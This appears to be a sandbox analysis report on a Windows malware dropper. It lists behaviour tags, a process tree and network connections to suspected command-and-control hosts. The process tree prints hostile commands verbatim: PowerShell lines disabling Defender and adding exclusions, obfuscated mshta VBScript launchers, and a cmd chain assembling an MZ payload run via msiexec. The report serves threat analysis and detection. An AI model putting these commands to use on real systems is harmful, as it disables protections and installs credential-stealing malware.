| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1104 set thread context of 4180 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe |
| PID 980 set thread context of 3196 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe |
| PID 4184 set thread context of 1528 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed096e68af113.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
Wed0937c2dc68a2496.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe
Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2600 -ip 2600
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
Wed09a6fb1d0dd846.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe
Wed0988d1c2bd9a37.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe
Wed098e48a54663552b.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe
Wed094d15aaa9a48.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe
Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe
Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe
Wed0911cd5800a45.exe
C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$40288,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 572
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe
Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3152 -ip 3152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 244
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$A0112,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed0911cd5800a45.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv z76pfHFsR0SkYGbr62ILBA.0.2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| NL | 45.133.1.107:80 | tcp | |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| N/A | 127.0.0.1:59128 | tcp | |
| N/A | 127.0.0.1:59130 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| FR | 51.178.186.149:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 60.37.61.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
